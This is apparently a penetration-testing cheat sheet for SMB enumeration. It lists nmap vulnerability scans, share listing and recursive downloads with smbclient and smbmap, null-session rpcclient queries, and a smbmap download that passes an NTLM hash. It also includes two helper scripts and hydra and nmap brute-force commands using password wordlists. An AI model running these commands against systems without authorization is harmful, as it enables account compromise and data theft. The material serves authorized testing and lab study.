SMB Enumeration (Port 139, 445)
Quick Intro
SMB stand for Server Message Block
SMB allows you to share your resources to other computers over the network,
There is 3 version of SMB,
SMB1 version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version
SMB2 reduced "chattiness" of SMB1. Guest access disabled by default
SMB3 guest access disabled, uses encryption. Most secure.
TCP port 139 is SMB over NetBios.
TCP port 445 is SMB over Ip. This is newer version of SMB
List of SMB versions and corresponding Windows versions:
SMB1 – Windows 2000, XP and Windows 2003.
SMB2 – Windows Vista SP1 and Windows 2008
SMB2.1 – Windows 7 and Windows 2008 R2
SMB3 – Windows 8 and Windows 2012.
Nmap Scanning
nmap -n -v -Pn -p139,445 -sV 192.168.0.101
# Getting version informationnmap 192.168.0.101 --script=smb-enum*
nmap 192.168.0.101 --script=smb-vuln*
nmap 192.1688.0.101 --script=smb-os*
# Scan with NSE ScriptsList Available Shares
smbclient
smbclient -L \\\\192.168.1.101\\
# Will list all shares
smbclient -L \\$ip --option='client min protocol=NT1'
# if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
smbclient //HOST/PATH -c 'recurse;ls'
# List all files recurslysmbmap
smbmap -H $ip
# Will list all shares with available permissions
smbmap -H $ip -R $sharename
# Recursively list dirs, and files
smbmap -u '' -p '' -H $ip
smbmap -u guest -p '' -H $ip
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
# With credentialsNmap
nmap --script smb-enum-shares -p 139,445 $ipConnecting To Shares
smbclient \\\\192.168.1.101\\C$
or
smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1'
smbclient \\\\192.168.1.101\\admin$ -U t-skid
# Connect with valid username and password
# Specify username with -UDownloading multi files
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
# With smbclient
smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
# Downloads a file in quiet mode
smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*'
# download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt workEnum4Linux
enum4linux -a $ip
enum4linux -u 'guest' -p '' -a $ipNull session with rpcclient
Rpcclient is a Linux tool used for executing client-side MS-RPC functions. A null session is a connection with a samba or SMB server that does not require authentication with a password. Null sessions were enabled by default on legacy systems but have been disabled from Windows XP SP2 and Windows Server 2003. Nowadays it is not very common to encounter hosts that have null sessions enabled, but it is worth a try if you do stumble across one. The connection uses port 445.
rpcclient -U "" <ip>
# You will be asked for a password but leave it blank and press enter to continue.Some important commands
rpcclient>srvinfo
rpcclient>enumdomusers
rpcclient>getdompwinfoEnumerating users with IPC$
if IPC$ share is enabled , and have anonymous access we can enumerate users through lookupsid.py
lookupsid.py anonymous@10.10.215.206Google to see if version is vulnerable
SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename
SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipenamesmbver.sh
good script to use if none of scanner giving version for smb
#!/bin/sh
#Author: rewardone
#Description:
# Requires root or enough permissions to use tcpdump
# Will listen for the first 7 packets of a null login
# and grab the SMB Version
#Notes:
# Will sometimes not capture or will print multiple
# lines. May need to run a second time for success.
if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi
if [ ! -z $2 ]; then rport=$2; else rport=139; fi
tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
sleep 0.5 && echo ""You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , Session Setup Andx Response and there you will find smb version :)
smbenum.sh
#!/bin/bash
# smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal
# SECFORCE - Antonio Quina
# All credits to Bernardo Damele A. G. <bernardo.damele@gmail.com> for the ms08-067_check.py script
IFACE="eth0"
if [ $# -eq 0 ]
then
echo "Usage: $0 <IP>"
echo "eg: $0 10.10.10.10"
exit
else
IP="$1"
fi
echo -e "\n########## Getting Netbios name ##########"
nbtscan -v -h $IP
echo -e "\n########## Checking for NULL sessions ##########"
output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`
echo $output
echo -e "\n########## Enumerating domains ##########"
bash -c "echo 'enumdomains' | rpcclient $IP -U%"
echo -e "\n########## Enumerating password and lockout policies ##########"
polenum $IP
echo -e "\n########## Enumerating users ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP
bash -c "echo 'enumdomusers' | rpcclient $IP -U%"
bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt
echo -e "\n########## Enumerating Administrators ##########"
net rpc group members "Administrators" -I $IP -U%
echo -e "\n########## Enumerating Domain Admins ##########"
net rpc group members "Domain Admins" -I $IP -U%
echo -e "\n########## Enumerating groups ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP
echo -e "\n########## Enumerating shares ##########"
nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP
echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
rm /tmp/$IP-users.txtBrute Force SMB
hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvvLast updated